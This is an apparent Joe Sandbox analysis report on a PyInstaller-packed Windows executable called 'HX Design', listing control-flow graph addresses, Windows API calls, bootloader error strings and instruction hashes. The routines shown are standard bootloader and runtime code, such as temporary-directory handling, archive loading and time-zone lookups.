237 7ff732063e0a-7ff732063e19 call 7ff732068830 234->237 238 7ff732063f01-7ff732063f08 234->238 251 7ff732063e1b-7ff732063e21 237->251 252 7ff732063e32-7ff732063e3c call 7ff732074f30 237->252 240 7ff732063f0e-7ff732063f15 238->240 241 7ff732064008-7ff732064010 238->241 240->241 244 7ff732063f1b-7ff732063f25 call 7ff7320633c0 240->244 245 7ff732064035-7ff732064067 call 7ff7320636a0 call 7ff732063360 call 7ff732063670 call 7ff732066fc0 call 7ff732066d70 241->245 246 7ff732064012-7ff73206402f PostMessageW GetMessageW 241->246 244->225 258 7ff732063f2b-7ff732063f3f call 7ff7320690c0 244->258 246->245 255 7ff732063e2d-7ff732063e2f 251->255 256 7ff732063e23-7ff732063e2b 251->256 263 7ff732063ef2-7ff732063efc call 7ff732068940 252->263 264 7ff732063e42-7ff732063e48 252->264 255->252 256->255 271 7ff732063f64-7ff732063fa0 call 7ff732068940 call 7ff7320689e0 call 7ff732066fc0 call 7ff732066d70 call 7ff7320688e0 258->271 272 7ff732063f41-7ff732063f5e PostMessageW GetMessageW 258->272 263->238 264->263 268 7ff732063e4e-7ff732063e54 264->268 269 7ff732063e56-7ff732063e58 268->269 270 7ff732063e5f-7ff732063e61 268->270 274 7ff732063e67-7ff732063e83 call 7ff732066dc0 call 7ff732067340 269->274 275 7ff732063e5a 269->275 270->238 270->274 306 7ff732063fa5-7ff732063fa7 271->306 272->271 289 7ff732063e8e-7ff732063e95 274->289 290 7ff732063e85-7ff732063e8c 274->290 275->238 293 7ff732063e97-7ff732063ea4 call 7ff732066e00 289->293 294 7ff732063eaf-7ff732063eb9 call 7ff7320671b0 289->294 292 7ff732063edb-7ff732063ef0 call 7ff732062a50 call 7ff732066fc0 call 7ff732066d70 290->292 292->238 293->294 308 7ff732063ea6-7ff732063ead 293->308 304 7ff732063ebb-7ff732063ec2 294->304 305 7ff732063ec4-7ff732063ed2 call 7ff7320674f0 294->305 304->292 305->238 318 7ff732063ed4 305->318 310 7ff732063fa9-7ff732063fbf call 7ff732068ed0 call 7ff7320688e0 306->310 311 7ff732063ff5-7ff732064003 call 7ff732061900 306->311 308->292 310->311 323 7ff732063fc1-7ff732063fd6 310->323 311->225 318->292 324 7ff732063fd8-7ff732063feb call 7ff732062710 call 7ff732061900 323->324 325 7ff732063ff0 call 7ff732062a50 323->325 324->225 325->311
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                      • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                                      • Opcode ID: 824ed701c3c560fed3adc96ede838a2023945a6ada8c955277e175104ca074ca
                                                                                                                                                                                                                                                      • Instruction ID: 8f7f528829b4290758f5c6021b6df81c97e115fe6210bf7ae367767ce32e76d3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 824ed701c3c560fed3adc96ede838a2023945a6ada8c955277e175104ca074ca
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D32AB21B08682B5FB18BB3494553BAE6A1EF45B80FC44032DA5D432D6EFACE55CE374

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 479 7ff732085c00-7ff732085c3b call 7ff732085588 call 7ff732085590 call 7ff7320855f8 486 7ff732085e65-7ff732085eb1 call 7ff73207a900 call 7ff732085588 call 7ff732085590 call 7ff7320855f8 479->486 487 7ff732085c41-7ff732085c4c call 7ff732085598 479->487 512 7ff732085eb7-7ff732085ec2 call 7ff732085598 486->512 513 7ff732085fef-7ff73208605d call 7ff73207a900 call 7ff732081578 486->513 487->486 492 7ff732085c52-7ff732085c5c 487->492 494 7ff732085c7e-7ff732085c82 492->494 495 7ff732085c5e-7ff732085c61 492->495 499 7ff732085c85-7ff732085c8d 494->499 498 7ff732085c64-7ff732085c6f 495->498 501 7ff732085c7a-7ff732085c7c 498->501 502 7ff732085c71-7ff732085c78 498->502 499->499 503 7ff732085c8f-7ff732085ca2 call 7ff73207d5fc 499->503 501->494 505 7ff732085cab-7ff732085cb9 501->505 502->498 502->501 510 7ff732085cba-7ff732085cc6 call 7ff73207a948 503->510 511 7ff732085ca4-7ff732085ca6 call 7ff73207a948 503->511 520 7ff732085ccd-7ff732085cd5 510->520 511->505 512->513 522 7ff732085ec8-7ff732085ed3 call 7ff7320855c8 512->522 533 7ff73208606b-7ff73208606e 513->533 534 7ff73208605f-7ff732086066 513->534 520->520 523 7ff732085cd7-7ff732085ce8 call 7ff732080474 520->523 522->513 531 7ff732085ed9-7ff732085efc call 7ff73207a948 GetTimeZoneInformation 522->531 523->486 532 7ff732085cee-7ff732085d44 call 7ff73208a4d0 * 4 call 7ff732085b1c 523->532 550 7ff732085fc4-7ff732085fee call 7ff732085580 call 7ff732085570 call 7ff732085578 531->550 551 7ff732085f02-7ff732085f23 531->551 591 7ff732085d46-7ff732085d4a 532->591 536 7ff7320860a5-7ff7320860b8 call 7ff73207d5fc 533->536 537 7ff732086070 533->537 535 7ff7320860fb-7ff7320860fe 534->535 541 7ff732086104-7ff73208610c call 7ff732085c00 535->541 542 7ff732086073 535->542 555 7ff7320860ba 536->555 556 7ff7320860c3-7ff7320860de call 7ff732081578 536->556 537->542 548 7ff732086078-7ff7320860a4 call 7ff73207a948 call 7ff73206c550 541->548 542->548 549 7ff732086073 call 7ff732085e7c 542->549 549->548 558 7ff732085f2e-7ff732085f35 551->558 559 7ff732085f25-7ff732085f2b 551->559 565 7ff7320860bc-7ff7320860c1 call 7ff73207a948 555->565 579 7ff7320860e5-7ff7320860f7 call 7ff73207a948 556->579 580 7ff7320860e0-7ff7320860e3 556->580 560 7ff732085f49 558->560 561 7ff732085f37-7ff732085f3f 558->561 559->558 570 7ff732085f4b-7ff732085fbf call 7ff73208a4d0 * 4 call 7ff732082b5c call 7ff732086114 * 2 560->570 561->560 567 7ff732085f41-7ff732085f47 561->567 565->537 567->570 570->550 579->535 580->565 593 7ff732085d4c 591->593 594 7ff732085d50-7ff732085d54 591->594 593->594 594->591 596 7ff732085d56-7ff732085d7b call 7ff732076b58 594->596 602 7ff732085d7e-7ff732085d82 596->602 604 7ff732085d84-7ff732085d8f 602->604 605 7ff732085d91-7ff732085d95 602->605 604->605 607 7ff732085d97-7ff732085d9b 604->607 605->602 610 7ff732085d9d-7ff732085dc5 call 7ff732076b58 607->610 611 7ff732085e1c-7ff732085e20 607->611 619 7ff732085dc7 610->619 620 7ff732085de3-7ff732085de7 610->620 612 7ff732085e27-7ff732085e34 611->612 613 7ff732085e22-7ff732085e24 611->613 615 7ff732085e36-7ff732085e4c call 7ff732085b1c 612->615 616 7ff732085e4f-7ff732085e5e call 7ff732085580 call 7ff732085570 612->616 613->612 615->616 616->486 623 7ff732085dca-7ff732085dd1 619->623 620->611 625 7ff732085de9-7ff732085e07 call 7ff732076b58 620->625 623->620 626 7ff732085dd3-7ff732085de1 623->626 631 7ff732085e13-7ff732085e1a 625->631 626->620 626->623 631->611 632 7ff732085e09-7ff732085e0d 631->632 632->611 633 7ff732085e0f 632->633 633->631
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085C45
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732085598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320855AC
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A948: RtlFreeHeap.NTDLL(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A948: GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF73207A8DF,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207A909
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF73207A8DF,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207A92E
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085C34
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7320855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73208560C
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085EAA
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085EBB
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085ECC
                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73208610C), ref: 00007FF732085EF3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                      • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                      • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                      • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                                      • Instruction ID: 8afa3c6fb46f86bfbe3d2fda8b234fdb1bc88e3c05afed86e31a574ae7926d18
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54D1F632A0824266E720FF65D4911BAEB91FF84784FC54035DE0D47696DFBCE449E760

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 693 7ff732086964-7ff7320869d7 call 7ff732086698 696 7ff7320869d9-7ff7320869e2 call 7ff732074ee8 693->696 697 7ff7320869f1-7ff7320869fb call 7ff732078520 693->697 702 7ff7320869e5-7ff7320869ec call 7ff732074f08 696->702 703 7ff7320869fd-7ff732086a14 call 7ff732074ee8 call 7ff732074f08 697->703 704 7ff732086a16-7ff732086a7f CreateFileW 697->704 719 7ff732086d32-7ff732086d52 702->719 703->702 705 7ff732086afc-7ff732086b07 GetFileType 704->705 706 7ff732086a81-7ff732086a87 704->706 712 7ff732086b5a-7ff732086b61 705->712 713 7ff732086b09-7ff732086b44 GetLastError call 7ff732074e7c CloseHandle 705->713 709 7ff732086ac9-7ff732086af7 GetLastError call 7ff732074e7c 706->709 710 7ff732086a89-7ff732086a8d 706->710 709->702 710->709 717 7ff732086a8f-7ff732086ac7 CreateFileW 710->717 715 7ff732086b69-7ff732086b6c 712->715 716 7ff732086b63-7ff732086b67 712->716 713->702 728 7ff732086b4a-7ff732086b55 call 7ff732074f08 713->728 723 7ff732086b72-7ff732086bc7 call 7ff732078438 715->723 724 7ff732086b6e 715->724 716->723 717->705 717->709 731 7ff732086bc9-7ff732086bd5 call 7ff7320868a0 723->731 732 7ff732086be6-7ff732086c17 call 7ff732086418 723->732 724->723 728->702 731->732 740 7ff732086bd7 731->740 738 7ff732086c1d-7ff732086c5f 732->738 739 7ff732086c19-7ff732086c1b 732->739 742 7ff732086c81-7ff732086c8c 738->742 743 7ff732086c61-7ff732086c65 738->743 741 7ff732086bd9-7ff732086be1 call 7ff73207aac0 739->741 740->741 741->719 745 7ff732086c92-7ff732086c96 742->745 746 7ff732086d30 742->746 743->742 744 7ff732086c67-7ff732086c7c 743->744 744->742 745->746 748 7ff732086c9c-7ff732086ce1 CloseHandle CreateFileW 745->748 746->719 750 7ff732086d16-7ff732086d2b 748->750 751 7ff732086ce3-7ff732086d11 GetLastError call 7ff732074e7c call 7ff732078660 748->751 750->746 751->750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1617910340-0
                                                                                                                                                                                                                                                      • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                      • Instruction ID: bb852ee9146f8da58719cd6dd1fd98c8801e4ce85c16be6e33d4027131075355
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FC1DF32B28A4596EB10EFA9C4802BD7771F749BA8F810235DA2E9B7D4DF78D059D310

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00007FF732068919,00007FF732063FA5), ref: 00007FF73206842B
                                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684AE
                                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684CD
                                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684DB
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684EC
                                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNELBASE(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684F5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                      • String ID: %s\*
                                                                                                                                                                                                                                                      • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                      • Opcode ID: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                                      • Instruction ID: 692f105b74414b0cf88b93048db4bf81d73cd91066cfb5e7541dae3b84839ba2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33416221B0C542A5EE20BB64F4841BAA3A0FF94754FC00232EA9D83AD4EFBCD54DD764

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1014 7ff732085e7c-7ff732085eb1 call 7ff732085588 call 7ff732085590 call 7ff7320855f8 1021 7ff732085eb7-7ff732085ec2 call 7ff732085598 1014->1021 1022 7ff732085fef-7ff73208605d call 7ff73207a900 call 7ff732081578 1014->1022 1021->1022 1027 7ff732085ec8-7ff732085ed3 call 7ff7320855c8 1021->1027 1034 7ff73208606b-7ff73208606e 1022->1034 1035 7ff73208605f-7ff732086066 1022->1035 1027->1022 1033 7ff732085ed9-7ff732085efc call 7ff73207a948 GetTimeZoneInformation 1027->1033 1048 7ff732085fc4-7ff732085fee call 7ff732085580 call 7ff732085570 call 7ff732085578 1033->1048 1049 7ff732085f02-7ff732085f23 1033->1049 1037 7ff7320860a5-7ff7320860b8 call 7ff73207d5fc 1034->1037 1038 7ff732086070 1034->1038 1036 7ff7320860fb-7ff7320860fe 1035->1036 1041 7ff732086104-7ff73208610c call 7ff732085c00 1036->1041 1042 7ff732086073 1036->1042 1052 7ff7320860ba 1037->1052 1053 7ff7320860c3-7ff7320860de call 7ff732081578 1037->1053 1038->1042 1046 7ff732086078-7ff7320860a4 call 7ff73207a948 call 7ff73206c550 1041->1046 1042->1046 1047 7ff732086073 call 7ff732085e7c 1042->1047 1047->1046 1055 7ff732085f2e-7ff732085f35 1049->1055 1056 7ff732085f25-7ff732085f2b 1049->1056 1061 7ff7320860bc-7ff7320860c1 call 7ff73207a948 1052->1061 1073 7ff7320860e5-7ff7320860f7 call 7ff73207a948 1053->1073 1074 7ff7320860e0-7ff7320860e3 1053->1074 1057 7ff732085f49 1055->1057 1058 7ff732085f37-7ff732085f3f 1055->1058 1056->1055 1065 7ff732085f4b-7ff732085fbf call 7ff73208a4d0 * 4 call 7ff732082b5c call 7ff732086114 * 2 1057->1065 1058->1057 1063 7ff732085f41-7ff732085f47 1058->1063 1061->1038 1063->1065 1065->1048 1073->1036 1074->1061
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085EAA
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7320855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73208560C
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085EBB
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732085598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320855AC
                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF732085ECC
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7320855C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7320855DC
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A948: RtlFreeHeap.NTDLL(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF73207A948: GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968
                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73208610C), ref: 00007FF732085EF3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                      • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                      • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                      • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                                      • Instruction ID: ad0385f4b0f1b262279072445e17238f0daa9bbdaece61cdeeaa393386809975
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2851B532A08642A6E750FF31D8815BAF761FB88784FC14135EA4D47696DFBCE409E760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                                                                                                      • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                      • Instruction ID: 02c21f81cf5930699b53effc15c3261ef440a048d7f8fde97923d82809baa6ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42F0A422A1864686F7609B60B488776F350EB84328F840235DAAD02AD4DF7CD04CDB04
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1010374628-0
                                                                                                                                                                                                                                                      • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                                      • Instruction ID: a6d6cd5d5dfe5c6d7f8d346c34cfac0cffeeadeff2f1888ef831a98d9c8c0a75
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C020F22B1D78360FA90BB15A50027BE691EF45BA0FC58634DD6D067D2EEFDA419E330

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
